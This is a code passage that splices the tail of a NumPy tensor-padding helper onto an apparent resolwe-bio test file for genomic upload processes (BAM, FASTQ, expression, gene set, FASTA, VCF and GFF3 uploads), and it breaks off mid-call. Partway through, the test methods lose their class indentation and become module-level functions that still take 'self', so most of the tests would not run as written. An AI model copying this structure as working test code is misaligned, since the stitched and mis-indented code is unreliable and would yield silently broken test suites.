             remaining dims are the element-wise maxima of the input shapes
    """
    ndim = len(tensor_list[0].shape)
    dtype = tensor_list[0].dtype
    # NOTE(review): placement below assumes every tensor shares the first-dim
    # size of tensor_list[0]; preserved from the original implementation.
    islice = tensor_list[0].shape[0]
    dimensions = [sum(tensor.shape[0] for tensor in tensor_list)]
    for dim in range(1, ndim):
        dimensions.append(max(tensor.shape[dim] for tensor in tensor_list))
    if pad == 0:
        all_tensor = np.zeros(tuple(dimensions), dtype=dtype)
    elif pad == 1:
        all_tensor = np.ones(tuple(dimensions), dtype=dtype)
    else:
        all_tensor = np.full(tuple(dimensions), pad, dtype=dtype)
    # Generalized placement: works for any ndim >= 1 (the original hard-coded
    # ndim 1..5 and raised 'unimplemented' beyond that).
    for ind, tensor in enumerate(tensor_list):
        index = (slice(ind * islice, (ind + 1) * islice),)
        index += tuple(slice(0, extent) for extent in tensor.shape[1:])
        all_tensor[index] = tensor
    return all_tensor
|
import os
from pathlib import Path
from resolwe.flow.models import Data
from resolwe.test import tag_process, with_resolwe_host
from resolwe_bio.utils.test import KBBioProcessTestCase, skipUnlessLargeFiles
class UploadProcessorTestCase(KBBioProcessTestCase):
    @tag_process("upload-bam", "upload-bam-indexed")
    def test_bam_upload(self):
        """Upload a BAM (plain and pre-indexed) and verify the derived
        outputs (sorted BAM, index, stats, bigwig) and annotation fields."""
        inputs = {
            "src": "alignment_name_sorted.bam",
            "species": "Homo sapiens",
            "build": "hg19",
        }
        upload_bam = self.run_process("upload-bam", inputs)
        self.assertFile(upload_bam, "bam", "alignment_position_sorted.bam")
        self.assertFile(upload_bam, "bai", "alignment_bam_upload_index.bai")
        self.assertFile(upload_bam, "stats", "alignment_bam_upload_stats.txt")
        self.assertFile(upload_bam, "bigwig", "alignment_bam_upload_bigwig.bw")
        self.assertFields(upload_bam, "species", "Homo sapiens")
        self.assertFields(upload_bam, "build", "hg19")
        # Index whose basename does not match the BAM must be rejected.
        inputs = {
            "src": "alignment_position_sorted.bam",
            "src2": "alignment_bam_upload_index.bam.bai",
            "species": "Homo sapiens",
            "build": "hg19",
        }
        upload_bam = self.run_process("upload-bam-indexed", inputs, Data.STATUS_ERROR)
        self.assertEqual(
            upload_bam.process_error[0],
            "BAI should have the same name as BAM with .bai extension",
        )
        # Matching BAM/BAI pair uploads successfully.
        inputs = {
            "src": "alignment_position_sorted.bam",
            "src2": "alignment_position_sorted.bam.bai",
            "species": "Homo sapiens",
            "build": "hg19",
        }
        upload_bam = self.run_process("upload-bam-indexed", inputs)
        self.assertFile(upload_bam, "bam", "alignment_position_sorted.bam")
        self.assertFile(upload_bam, "bai", "alignment_position_sorted.bam.bai")
        self.assertFile(upload_bam, "stats", "alignment_bam_upload_stats.txt")
        self.assertFile(upload_bam, "bigwig", "alignment_bam_upload_bigwig.bw")
        self.assertFields(upload_bam, "species", "Homo sapiens")
        self.assertFields(upload_bam, "build", "hg19")
    @with_resolwe_host
    @tag_process("upload-expression")
    def test_upload_expression(self):
        """Exercise the upload-expression process: invalid input combinations,
        rc-only / exp-only / combined uploads, line-ending normalization,
        numeric feature ids, and filename edge cases."""
        input_folder = Path("test_upload_expression") / "input"
        output_folder = Path("test_upload_expression") / "output"
        # No expression file at all -> error.
        inputs = {
            "exp_type": "TPM",
            "exp_name": "Expression",
            "source": "UCSC",
            "species": "Homo sapiens",
            "build": "hg19",
        }
        self.run_process("upload-expression", inputs, Data.STATUS_ERROR)
        # 'exp' without 'exp_type' -> error.
        inputs = {
            "exp": input_folder / "exp_1_tpm.tab.gz",
            "rc": input_folder / "exp_1_rc.tab.gz",
            "exp_name": "Expression",
            "source": "UCSC",
            "species": "Homo sapiens",
            "build": "hg19",
        }
        self.run_process("upload-expression", inputs, Data.STATUS_ERROR)
        # Raw-counts-only upload: rc doubles as the expression output.
        inputs = {
            "rc": input_folder / "exp_1_rc.tab.gz",
            "exp_name": "Expression",
            "source": "UCSC",
            "species": "Homo sapiens",
            "build": "hg19",
        }
        exp_3 = self.run_process("upload-expression", inputs)
        self.assertFile(exp_3, "rc", output_folder / "exp_1_rc.tab.gz")
        self.assertFile(exp_3, "exp", output_folder / "exp_1_rc.tab.gz")
        self.assertFile(
            exp_3,
            "exp_set",
            output_folder / "exp_1_rc_expressions3.txt.gz",
            compression="gzip",
        )
        self.assertJSON(
            exp_3, exp_3.output["exp_json"], "", output_folder / "exp_1.json.gz"
        )
        self.assertFields(exp_3, "species", "Homo sapiens")
        self.assertFields(exp_3, "build", "hg19")
        self.assertFields(exp_3, "feature_type", "gene")
        # Normalized-expression-only upload.
        inputs = {
            "exp": input_folder / "exp_1_tpm.tab.gz",
            "exp_type": "TPM",
            "exp_name": "Expression",
            "source": "UCSC",
            "species": "Homo sapiens",
            "build": "hg19",
        }
        exp_4 = self.run_process("upload-expression", inputs)
        self.assertFile(exp_4, "exp", output_folder / "exp_1_tpm.tab.gz")
        self.assertFile(
            exp_4,
            "exp_set",
            output_folder / "exp_1_tpm_expressions.txt.gz",
            compression="gzip",
        )
        # Combined raw-count and normalized upload.
        inputs = {
            "rc": input_folder / "exp_1_rc.tab.gz",
            "exp": input_folder / "exp_1_tpm.tab.gz",
            "exp_type": "TPM",
            "exp_name": "Expression",
            "source": "UCSC",
            "species": "Homo sapiens",
            "build": "hg19",
        }
        exp_5 = self.run_process("upload-expression", inputs)
        self.assertFields(exp_5, "exp_type", "TPM")
        self.assertFile(exp_5, "exp", output_folder / "exp_1_tpm.tab.gz")
        self.assertFile(exp_5, "rc", output_folder / "exp_1_rc.tab.gz")
        self.assertFile(
            exp_5,
            "exp_set",
            output_folder / "exp_1_rc_expressions5.txt.gz",
            compression="gzip",
        )
        self.assertJSON(
            exp_5, exp_5.output["exp_json"], "", output_folder / "exp_1_norm.json.gz"
        )
        self.assertJSON(
            exp_5,
            exp_5.output["exp_set_json"],
            "",
            output_folder / "upload_exp_norm_set.json.gz",
        )
        # Mac (CR) line endings are normalized.
        inputs = {
            "rc": input_folder / "exp_mac_line_ending.txt.gz",
            "exp_name": "Expression",
            "source": "UCSC",
            "species": "Homo sapiens",
            "build": "hg19",
        }
        exp_6 = self.run_process("upload-expression", inputs)
        self.assertJSON(
            exp_6, exp_6.output["exp_json"], "", output_folder / "exp.json.gz"
        )
        self.assertFile(exp_6, "rc", output_folder / "exp_mac_line_ending.tab.gz")
        self.assertFile(
            exp_6,
            "exp_set",
            output_folder / "exp_mac_line_ending_expressions.txt.gz",
            compression="gzip",
        )
        # Unix (LF) line endings.
        inputs = {
            "rc": input_folder / "exp_unix_line_ending.txt.gz",
            "exp_name": "Expression",
            "source": "UCSC",
            "species": "Homo sapiens",
            "build": "hg19",
        }
        exp_7 = self.run_process("upload-expression", inputs)
        self.assertJSON(
            exp_7, exp_7.output["exp_json"], "", output_folder / "exp.json.gz"
        )
        # Windows (CRLF) line endings.
        inputs = {
            "rc": input_folder / "exp_windows_line_ending.txt.gz",
            "exp_name": "Expression",
            "source": "UCSC",
            "species": "Homo sapiens",
            "build": "hg19",
        }
        exp_8 = self.run_process("upload-expression", inputs)
        self.assertJSON(
            exp_8, exp_8.output["exp_json"], "", output_folder / "exp.json.gz"
        )
        # Check handling of numerical feature_ids in expression file
        inputs = {
            "rc": input_folder / "mm_ncbi_exp.tab.gz",
            "exp_name": "Expression",
            "source": "NCBI",
            "species": "Mus musculus",
            "build": "hg19",
        }
        exp_9 = self.run_process("upload-expression", inputs)
        self.assertFile(
            exp_9,
            "exp_set",
            output_folder / "mm_ncbi_exp_set.txt.gz",
            compression="gzip",
        )
        # A .tsv extension is accepted and converted to .tab.
        inputs = {
            "exp": input_folder / "exp_1_tpm.tsv.gz",
            "exp_type": "TPM",
            "exp_name": "Expression",
            "source": "UCSC",
            "species": "Homo sapiens",
            "build": "hg19",
        }
        exp_10 = self.run_process("upload-expression", inputs)
        self.assertFile(exp_10, "exp", output_folder / "exp_1_tpm.tab.gz")
        self.assertFile(
            exp_10,
            "exp_set",
            output_folder / "exp_1_tpm_expressions.txt.gz",
            compression="gzip",
        )
        # Test files with wrong extension
        inputs = {
            "rc": input_folder / "exp_1_rc.xlsx.gz",
            "exp": input_folder / "exp_1_tpm.tab.gz",
            "exp_type": "TPM",
            "exp_name": "Expression",
            "source": "UCSC",
            "species": "Homo sapiens",
            "build": "hg19",
        }
        self.run_process("upload-expression", inputs, Data.STATUS_ERROR)
        inputs = {
            "exp": input_folder / "exp_1_tpm.gz",
            "exp_type": "TPM",
            "exp_name": "Expression",
            "source": "UCSC",
            "species": "Homo sapiens",
            "build": "hg19",
        }
        self.run_process("upload-expression", inputs, Data.STATUS_ERROR)
        # A filename containing an extra dot is preserved verbatim.
        inputs = {
            "rc": input_folder / "exp.1_rc.tab.gz",
            "exp_name": "Expression",
            "source": "UCSC",
            "species": "Homo sapiens",
            "build": "hg19",
        }
        exp_13 = self.run_process("upload-expression", inputs)
        self.assertFields(exp_13, "rc", {"file": "exp.1_rc.tab.gz", "total_size": 99})
        self.assertFields(exp_13, "exp", {"file": "exp.1_rc.tab.gz", "total_size": 99})
@with_resolwe_host
@tag_process("upload-cxb", "upload-expression-cuffnorm")
def test_upload_cuffquant_expr(self):
    """Upload a cuffquant .cxb file, then a cuffnorm expression table tied to it."""
    input_folder = Path("test_upload_expression") / "input"
    output_folder = Path("test_upload_expression") / "output"
    inputs = {
        "src": "cuffquant 1.cxb",
        "source": "UCSC",
        "species": "Homo sapiens",
        "build": "hg19",
    }
    cxb = self.run_process("upload-cxb", inputs)
    # The cuffnorm upload references the cuffquant data object by database id.
    inputs = {"exp": input_folder / "cuffquant_exp.tab", "cxb": cxb.id}
    exp = self.run_process("upload-expression-cuffnorm", inputs)
    self.assertFields(exp, "feature_type", "gene")
    self.assertFile(
        exp,
        "exp_set",
        output_folder / "cuffquant_exp_expressions.txt.gz",
        compression="gzip",
    )
@tag_process("upload-fastq-paired")
def test_upload_paired_end_reads(self):
    """Validation and upload of paired-end FASTQ files.

    Covers: mismatched mate-file counts, duplicate input names, unequal and
    unordered read pairs, valid gzipped and plain FASTQ input, lane merging,
    and a non-FASTQ (FASTA) input that must fail.
    """
    input_folder = Path("test_fastq_upload") / "input"
    output_folder = Path("test_fastq_upload") / "output"
    # A different number of mate files per side must fail.
    inputs = {
        "src1": [
            input_folder / "mate1_reordered.fastq.gz",
            input_folder / "mate1_diff_num_reads.fastq.gz",
        ],
        "src2": [input_folder / "mate2_reordered.fastq.gz"],
    }
    wrong_mates = self.run_process("upload-fastq-paired", inputs, Data.STATUS_ERROR)
    error_msg = [
        "The number of mate-pair files in split-lane samples must match. 2 and 1 "
        "input files were given for the -fq and -fq2 inputs, respectively."
    ]
    self.assertEqual(wrong_mates.process_error, error_msg)
    # Re-using the same file name across lanes must fail.
    inputs = {
        "src1": [
            input_folder / "mate1_reordered.fastq.gz",
            input_folder / "mate1_reordered.fastq.gz",
        ],
        "src2": [input_folder / "mate2_reordered.fastq.gz"],
    }
    wrong_mates2 = self.run_process(
        "upload-fastq-paired", inputs, Data.STATUS_ERROR
    )
    error_msg = [
        "Non-unique input file names detected: ['mate1_reordered.fastq.gz']."
    ]
    self.assertEqual(wrong_mates2.process_error, error_msg)
    # Mates with a different number of reads must fail.
    inputs = {
        "src1": [input_folder / "mate1_diff_num_reads.fastq.gz"],
        "src2": [input_folder / "mate2_diff_num_reads.fastq.gz"],
    }
    diff_numb_reads = self.run_process(
        "upload-fastq-paired", inputs, Data.STATUS_ERROR
    )
    error_msg = [
        "Format error in mate-pairs mate1_diff_num_reads.fastq.gz and mate2_diff_num_reads.fastq.gz. "
        "Error in sequence file at unknown line: Reads are improperly paired. "
        "There are more reads in file 2 than in file 1."
    ]
    self.assertEqual(diff_numb_reads.process_error, error_msg)
    # Mates whose read names do not pair up must fail.
    inputs = {
        "src1": [input_folder / "mate1_reordered.fastq.gz"],
        "src2": [input_folder / "mate2_reordered.fastq.gz"],
    }
    unordered_reads = self.run_process(
        "upload-fastq-paired", inputs, Data.STATUS_ERROR
    )
    error_msg = [
        "Format error in mate-pairs mate1_reordered.fastq.gz and mate2_reordered.fastq.gz. "
        "Error in sequence file at unknown line: Reads are improperly paired. Read "
        "name 'read1/1 some text' in file 1 does not match 'read2/2' in file 2."
    ]
    self.assertEqual(unordered_reads.process_error, error_msg)
    inputs = {
        "src1": [input_folder / "mate1.fastq.gz"],
        "src2": [input_folder / "mate2.fastq.gz"],
    }
    self.run_process("upload-fastq-paired", inputs, Data.STATUS_ERROR)
    # Valid gzipped paired-end input: outputs and FastQC reports are produced.
    inputs = {
        "src1": [input_folder / "rRNA_forw.fastq.gz"],
        "src2": [input_folder / "rRNA_rew.fastq.gz"],
    }
    reads = self.run_process("upload-fastq-paired", inputs)
    self.assertFiles(
        reads, "fastq", [output_folder / "rRNA_forw.fastq.gz"], compression="gzip"
    )
    self.assertFiles(
        reads, "fastq2", [output_folder / "rRNA_rew.fastq.gz"], compression="gzip"
    )
    del reads.output["fastqc_url"][0]["total_size"]  # Non-deterministic output.
    self.assertFields(
        reads,
        "fastqc_url",
        [
            {
                "file": "fastqc/rRNA_forw_fastqc/fastqc_report.html",
                "refs": ["fastqc/rRNA_forw_fastqc"],
                "size": 343222,
            }
        ],
    )
    del reads.output["fastqc_url2"][0]["total_size"]  # Non-deterministic output.
    self.assertFields(
        reads,
        "fastqc_url2",
        [
            {
                "file": "fastqc/rRNA_rew_fastqc/fastqc_report.html",
                "refs": ["fastqc/rRNA_rew_fastqc"],
                "size": 323297,
            }
        ],
    )
    # Lane merging concatenates per-lane files into a single mate pair.
    merged_lanes = self.run_process(
        "upload-fastq-paired",
        {
            "src1": [
                input_folder / "old_encoding.fastq.gz",
                input_folder / "old_encoding1.fastq.gz",
            ],
            "src2": [
                input_folder / "old_encoding_R2.fastq.gz",
                input_folder / "old_encoding1_R2.fastq.gz",
            ],
            "merge_lanes": True,
        },
    )
    self.assertFiles(
        merged_lanes,
        "fastq",
        [output_folder / "paired_end_merged_lanes_mate1.fastq.gz"],
        compression="gzip",
    )
    self.assertFiles(
        merged_lanes,
        "fastq2",
        [output_folder / "paired_end_merged_lanes_mate2.fastq.gz"],
        compression="gzip",
    )
    # Uncompressed FASTQ input is accepted and gzipped on upload.
    inputs = {
        "src1": [input_folder / "rRNA_forw.fastq"],
        "src2": [input_folder / "rRNA_rew.fastq"],
    }
    reads = self.run_process("upload-fastq-paired", inputs)
    self.assertFiles(
        reads, "fastq", [output_folder / "rRNA_forw.fastq.gz"], compression="gzip"
    )
    self.assertFiles(
        reads, "fastq2", [output_folder / "rRNA_rew.fastq.gz"], compression="gzip"
    )
    del reads.output["fastqc_url"][0]["total_size"]  # Non-deterministic output.
    self.assertFields(
        reads,
        "fastqc_url",
        [
            {
                "file": "fastqc/rRNA_forw_fastqc/fastqc_report.html",
                "refs": ["fastqc/rRNA_forw_fastqc"],
                "size": 343222,
            }
        ],
    )
    del reads.output["fastqc_url2"][0]["total_size"]  # Non-deterministic output.
    self.assertFields(
        reads,
        "fastqc_url2",
        [
            {
                "file": "fastqc/rRNA_rew_fastqc/fastqc_report.html",
                "refs": ["fastqc/rRNA_rew_fastqc"],
                "size": 323297,
            }
        ],
    )
    # A FASTA file passed as a mate must fail.
    inputs = {
        "src1": [input_folder / "genome.fasta.gz"],
        "src2": [input_folder / "rRNA_rew.fastq"],
    }
    reads = self.run_process("upload-fastq-paired", inputs, Data.STATUS_ERROR)
@tag_process("upload-fastq-single")
def test_upload_single_end_reads(self):
    """Validation and upload of single-end FASTQ files.

    Covers: empty, garbage and truncated inputs (with exact error messages),
    multi-lane upload, lane merging, and the .fq extension variant.
    """
    input_folder = Path("test_fastq_upload") / "input"
    output_folder = Path("test_fastq_upload") / "output"
    # A file with no reads must fail with an explicit message.
    empty_input = self.run_process(
        "upload-fastq-single",
        {"src": [input_folder / "empty.fastq.gz"]},
        Data.STATUS_ERROR,
    )
    error_msg = ["Input file empty.fastq.gz contains no read sequences."]
    self.assertEqual(empty_input.process_error, error_msg)
    # Content that is not FASTQ at all.
    garbage_input = self.run_process(
        "upload-fastq-single",
        {"src": [input_folder / "garbage.fastq.gz"]},
        Data.STATUS_ERROR,
    )
    error_msg = [
        "Error in file garbage.fastq.gz. Error in FASTQ file at line 1: Line expected "
        "to start with '@', but found 'S'"
    ]
    self.assertEqual(garbage_input.process_error, error_msg)
    # Mismatched sequence description lines.
    garbage_input_2 = self.run_process(
        "upload-fastq-single",
        {"src": [input_folder / "garbage2.fastq.gz"]},
        Data.STATUS_ERROR,
    )
    error_msg = [
        "Error in file garbage2.fastq.gz. Error in FASTQ file at line 3: Sequence descriptions "
        "don't match ('Some random content' != '+++').\nThe second sequence description must "
        "be either empty or equal to the first description."
    ]
    self.assertEqual(garbage_input_2.process_error, error_msg)
    # Truncated final record (missing quality line).
    missing_qual = self.run_process(
        "upload-fastq-single",
        {"src": [input_folder / "missing_qual.fastq.gz"]},
        Data.STATUS_ERROR,
    )
    error_msg = [
        "Error in file missing_qual.fastq.gz. Error in FASTQ file at line 16: "
        "Premature end of file encountered. The incomplete final record was: "
        "'@read4/1\\nGACAGGCCGTTTGAATGTTGACGGGATGTT\\n+\\n'"
    ]
    self.assertEqual(missing_qual.process_error, error_msg)
    inputs = {"src": [input_folder / "mate1.fastq.gz"]}
    self.run_process("upload-fastq-single", inputs, Data.STATUS_ERROR)
    # Two valid lanes: both files and both FastQC reports are kept.
    inputs = {
        "src": [
            input_folder / "rRNA_forw.fastq.gz",
            input_folder / "rRNA_rew.fastq.gz",
        ]
    }
    reads = self.run_process("upload-fastq-single", inputs)
    self.assertFiles(
        reads,
        "fastq",
        [
            output_folder / "rRNA_forw_single.fastq.gz",
            output_folder / "rRNA_rew.fastq.gz",
        ],
        compression="gzip",
    )
    del reads.output["fastqc_url"][0]["total_size"]  # Non-deterministic output.
    del reads.output["fastqc_url"][1]["total_size"]  # Non-deterministic output.
    self.assertFields(
        reads,
        "fastqc_url",
        [
            {
                "file": "fastqc/rRNA_forw_fastqc/fastqc_report.html",
                "refs": ["fastqc/rRNA_forw_fastqc"],
                "size": 343222,
            },
            {
                "file": "fastqc/rRNA_rew_fastqc/fastqc_report.html",
                "refs": ["fastqc/rRNA_rew_fastqc"],
                "size": 323297,
            },
        ],
    )
    # Lane merging concatenates the lanes into one FASTQ.
    merged_lanes = self.run_process(
        "upload-fastq-single",
        {
            "src": [
                input_folder / "rRNA_forw.fastq.gz",
                input_folder / "rRNA_rew.fastq.gz",
            ],
            "merge_lanes": True,
        },
    )
    self.assertFiles(
        merged_lanes,
        "fastq",
        [output_folder / "merged_single_end_reads.fastq.gz"],
        compression="gzip",
    )
    # The .fq extension is accepted and normalized to .fastq.gz.
    inputs = {
        "src": [
            input_folder / "rRNA_forw.fq.gz",
            input_folder / "rRNA_rew.fq.gz",
        ]
    }
    reads = self.run_process("upload-fastq-single", inputs)
    self.assertFiles(
        reads,
        "fastq",
        [
            output_folder / "rRNA_forw.fastq.gz",
            output_folder / "rRNA_rew.fastq.gz",
        ],
        compression="gzip",
    )
@tag_process("upload-diffexp")
def test_upload_de(self):
    """Upload DESeq2 differential-expression results; malformed numerics must fail."""
    inputs = {
        "src": "./diff_exp/input/deseq2_output.tab.gz",
        "source": "DICTYBASE",
        "gene_id": "gene_id",
        "logfc": "log2FoldChange",
        "fdr": "padj",
        "pvalue": "pvalue",
        "stat": "stat",
        "species": "Dictyostelium discoideum",
        "build": "dd-05-2009",
        "feature_type": "gene",
    }
    diff_exp = self.run_process("upload-diffexp", inputs)
    self.assertFile(diff_exp, "raw", "./diff_exp/input/deseq2_output.tab.gz")
    self.assertJSON(
        diff_exp,
        diff_exp.output["de_json"],
        "",
        "./diff_exp/output/deseq2_volcano_plot.json.gz",
    )
    # Test for malformed DE file. deseq2_bad_output.tab.gz file has a
    # mangled last value in last column where we replaced dot for a comma.
    # When importing to pandas DataFrame, this is no longer a float and
    # should throw an error.
    inputs["src"] = "./diff_exp/input/deseq2_bad_output.tab.gz"
    diff_bad = self.run_process("upload-diffexp", inputs, Data.STATUS_ERROR)
    error_msg = [
        "Column padj is not numeric. Please make sure that the input file has valid numeric values (i.e. "
        "periods for decimal places)."
    ]
    self.assertEqual(diff_bad.process_error, error_msg)
@tag_process("upload-diffexp")
def test_upload_de_check_field_type(self):
    """Gene IDs in the uploaded DE JSON must come out as strings, not numbers."""
    inputs = {
        "src": "./diff_exp/input/diff_exp_check_geneid_type.tab.gz",
        "source": "DICTYBASE",
        "gene_id": "index",
        "logfc": "log2FoldChange",
        "fdr": "padj",
        "pvalue": "pvalue",
        "stat": "stat",
        "species": "Dictyostelium discoideum",
        "build": "dd-05-2009",
        "feature_type": "gene",
    }
    diff_exp = self.run_process("upload-diffexp", inputs)
    saved_json, test_json = self.get_json(
        "./diff_exp/output/diff_exp_check_types.json.gz", diff_exp.output["de_json"]
    )
    self.assertEqual(test_json, saved_json)
    # BUG FIX: the previous `all(self.assertIsInstance(...) for ...)` stopped
    # after the first element (assertIsInstance returns None, which is falsy,
    # so all() short-circuits) and the result of all() was discarded anyway.
    # Assert on every gene id explicitly instead.
    for gene in test_json["gene_id"]:
        self.assertIsInstance(gene, str)
@tag_process("upload-bed")
def test_upload_bed(self):
    """A malformed BED upload must fail; a valid one produces the BED and its index."""
    inputs = {"src": "bad.bed", "species": "Homo sapiens", "build": "hg19"}
    # The failing run's data object is not inspected, so don't bind it
    # (the previous `bed = ...` assignment was immediately overwritten).
    self.run_process("upload-bed", inputs, Data.STATUS_ERROR)
    inputs = {"src": "good.bed", "species": "Homo sapiens", "build": "hg19"}
    bed = self.run_process("upload-bed", inputs)
    self.assertFile(bed, "bed", "good.bed")
    self.assertFile(bed, "tbi_jbrowse", "good.bed.gz.tbi")
@tag_process("upload-geneset")
def test_upload_geneset(self):
    """Upload a gene set table and verify the normalized output and metadata."""
    inputs = {"src": "geneset.tab.gz", "source": "UCSC", "species": "Homo sapiens"}
    geneset = self.run_process("upload-geneset", inputs)
    self.assertFile(geneset, "geneset", "geneset_out.tab.gz", compression="gzip")
    self.assertFields(geneset, "source", "UCSC")
    self.assertFields(geneset, "species", "Homo sapiens")
    self.assertJSON(geneset, geneset.output["geneset_json"], "", "geneset.json.gz")
@tag_process("create-geneset")
def test_create_geneset(self):
    """Create gene sets from explicit gene lists; duplicates are dropped with a warning."""
    inputs = {
        "genes": ["ABC", "DEF", "GHI"],
        "source": "UCSC",
        "species": "Homo sapiens",
    }
    geneset = self.run_process("create-geneset", inputs)
    self.assertFile(geneset, "geneset", "geneset_2.tab.gz", compression="gzip")
    self.assertJSON(
        geneset, geneset.output["geneset_json"], "", "geneset_2.json.gz"
    )
    self.assertFields(geneset, "source", "UCSC")
    self.assertFields(geneset, "species", "Homo sapiens")
    # "3" appears twice: the process must de-duplicate and warn.
    inputs = {
        "genes": ["1", "3", "3", "2"],
        "source": "NCBI",
        "species": "Homo sapiens",
    }
    geneset_2 = self.run_process("create-geneset", inputs)
    self.assertFile(geneset_2, "geneset", "geneset_3.tab.gz", compression="gzip")
    self.assertJSON(
        geneset_2, geneset_2.output["geneset_json"], "", "geneset_3.json.gz"
    )
    self.assertEqual(geneset_2.process_warning[0], "Removed duplicated genes.")
@tag_process("create-geneset-venn")
def test_create_venn(self):
    """Create a gene set from a Venn-diagram selection and verify all outputs."""
    inputs = {
        "genes": ["ABC", "GHI", "DEF"],
        "source": "UCSC",
        "venn": "venn.json.gz",
        "species": "Homo sapiens",
    }
    venn = self.run_process("create-geneset-venn", inputs)
    self.assertFile(venn, "geneset", "geneset_venn.tab.gz", compression="gzip")
    self.assertJSON(venn, venn.output["geneset_json"], "", "geneset_venn.json.gz")
    self.assertJSON(venn, venn.output["venn"], "", "venn.json.gz")
    self.assertFields(venn, "source", "UCSC")
    self.assertFields(venn, "species", "Homo sapiens")
@tag_process("upload-fastq-single")
def test_upload_reformating_single(self):
    """Old Phred-encoding single-end reads are re-encoded on upload."""
    inputs = {"src": ["old_encoding.fastq.gz"]}
    reads = self.run_process("upload-fastq-single", inputs)
    self.assertFiles(
        reads, "fastq", ["old_encoding_transformed.fastq.gz"], compression="gzip"
    )
@tag_process("upload-fastq-paired")
def test_upload_reformating_paired(self):
    """Old Phred-encoding paired-end reads are re-encoded on upload, per lane."""
    inputs = {
        "src1": ["old_encoding.fastq.gz", "old_encoding1.fastq.gz"],
        "src2": ["old_encoding_R2.fastq.gz", "old_encoding1_R2.fastq.gz"],
    }
    reads = self.run_process("upload-fastq-paired", inputs)
    self.assertFiles(
        reads,
        "fastq",
        ["old_encoding_transformed.fastq.gz", "old_encoding1_transformed.fastq.gz"],
        compression="gzip",
    )
    self.assertFiles(
        reads,
        "fastq2",
        [
            "old_encoding_transformed_R2.fastq.gz",
            "old_encoding1_transformed_R2.fastq.gz",
        ],
        compression="gzip",
    )
@tag_process("upload-master-file")
def test_upload_master_file(self):
    """Amplicon master-file upload: corrupted/duplicate inputs fail, valid ones
    produce the merged/no-merge/overlap-free BED files and primers."""
    inputs = {"src": "56G_masterfile_corrupted.txt", "panel_name": "56G panel, v2"}
    # The data objects of the failing runs are not inspected, so don't bind
    # them (the previous `master_file = ...` assignments were dead stores).
    self.run_process("upload-master-file", inputs, Data.STATUS_ERROR)
    # Check for non-unique amplicon names
    inputs["src"] = "56G masterfile_dup_amplicon_names.txt.gz"
    self.run_process("upload-master-file", inputs, Data.STATUS_ERROR)
    # Check if primer sequences are allowed also in lowercase
    inputs["src"] = "56G masterfile_lowercase_bases.txt.gz"
    self.run_process("upload-master-file", inputs)
    inputs["src"] = "56G_masterfile_170113.txt.gz"
    master_file = self.run_process("upload-master-file", inputs)
    self.assertFile(master_file, "bedfile", "amplicon_master_file_merged.bed")
    self.assertFile(
        master_file, "nomergebed", "amplicon_master_file_nomergebed.bed"
    )
    self.assertFile(
        master_file, "olapfreebed", "amplicon_master_file_olapfreebed.bed"
    )
    self.assertFile(master_file, "primers", "amplicon_primers.bed")
    self.assertFields(master_file, "panel_name", "56G panel, v2")
@tag_process("upload-etc")
def test_upload_etc(self):
    """Upload an ETC (expression time course) Excel file and check the JSON output."""
    inputs = {"src": "etc_upload_input.xls"}
    etc = self.run_process("upload-etc", inputs)
    self.assertFile(etc, "etcfile", "test_etc.json.gz")
@tag_process("upload-fasta-nucl")
def test_upload_nucl_seq(self):
    """Upload a nucleotide FASTA: valid input yields fasta/fai/dict outputs;
    empty, malformed and incomplete inputs fail with exact error messages."""
    seq = self.run_process(
        "upload-fasta-nucl",
        {
            "src": os.path.join("nucl_seq", "input", "genome.fasta.gz"),
            "species": "Dictyostelium discoideum",
            "build": "dicty_2.7",
        },
    )
    self.assertFile(
        seq,
        "fastagz",
        os.path.join("nucl_seq", "output", "genome.fasta.gz"),
        compression="gzip",
    )
    self.assertFile(
        seq, "fasta", os.path.join("nucl_seq", "output", "genome.fasta")
    )
    self.assertFile(
        seq, "fai", os.path.join("nucl_seq", "output", "genome.fasta.fai")
    )
    self.assertFile(
        seq, "fasta_dict", os.path.join("nucl_seq", "output", "genome.dict")
    )
    self.assertFields(seq, "species", "Dictyostelium discoideum")
    self.assertFields(seq, "build", "dicty_2.7")
    self.assertFields(seq, "num_seqs", 1)
    # A FASTA with no sequence data must fail.
    empty_input = {
        "src": os.path.join("nucl_seq", "input", "empty.fasta"),
        "species": "Dictyostelium discoideum",
        "build": "dicty_2.7",
    }
    empty = self.run_process("upload-fasta-nucl", empty_input, Data.STATUS_ERROR)
    error_msg = ["The uploaded .FASTA file empty.fasta contains no sequence data."]
    self.assertEqual(empty.process_error, error_msg)
    # A file that is not FASTA at all must fail with a parser error.
    malformed_input = {
        "src": os.path.join("nucl_seq", "input", "malformed.fasta"),
        "species": "Dictyostelium discoideum",
        "build": "dicty_2.7",
    }
    malformed = self.run_process(
        "upload-fasta-nucl", malformed_input, Data.STATUS_ERROR
    )
    error_msg = [
        "Format error in the uploaded file malformed.fasta. Error in FASTA file at "
        "line 1: Expected '>' at beginning of record, but got 'foo'."
    ]
    self.assertEqual(malformed.process_error, error_msg)
    # A header with no sequence behind it counts as "no sequence data".
    incomplete_input = {
        "src": os.path.join("nucl_seq", "input", "incomplete.fasta"),
        "species": "Dictyostelium discoideum",
        "build": "dicty_2.7",
    }
    incomplete = self.run_process(
        "upload-fasta-nucl", incomplete_input, Data.STATUS_ERROR
    )
    error_msg = [
        "The uploaded .FASTA file incomplete.fasta contains no sequence data."
    ]
    self.assertEqual(incomplete.process_error, error_msg)
@tag_process("upload-variants-vcf")
def test_upload_vcf(self):
    """Upload a VCF: it is bgzipped, tabix-indexed and annotated with metadata."""
    vcf = self.run_process(
        "upload-variants-vcf",
        {
            "src": "igv_human.lf.vcf",
            "species": "Homo sapiens",
            "build": "b37",
        },
    )
    self.assertFile(vcf, "vcf", "igv_human.lf.vcf.gz", compression="gzip")
    self.assertFileExists(vcf, "tbi")
    self.assertFields(vcf, "species", "Homo sapiens")
    self.assertFields(vcf, "build", "b37")
@tag_process("upload-gff3")
def test_upload_gff3(self):
    """Upload a GFF3 annotation: sorted file, IGV index and JBrowse track are built."""
    inputs = {
        "src": "PGSC upload.gff3",
        "build": "ST",
        "source": "PGSC",
        "species": "Solanum tuberosum",
    }
    upload_gff3 = self.run_process("upload-gff3", inputs)
    del upload_gff3.output["annot_sorted_track_jbrowse"][
        "total_size"
    ]  # Non-deterministic output.
    self.assertFile(upload_gff3, "annot_sorted", "PGSC upload_sorted.gff3")
    del upload_gff3.output["annot_sorted_idx_igv"][
        "total_size"
    ]  # Non-deterministic output.
    self.assertFields(
        upload_gff3,
        "annot_sorted_idx_igv",
        {"file": "PGSC upload_sorted.gff3.idx"},
    )
    self.assertFields(
        upload_gff3,
        "annot_sorted_track_jbrowse",
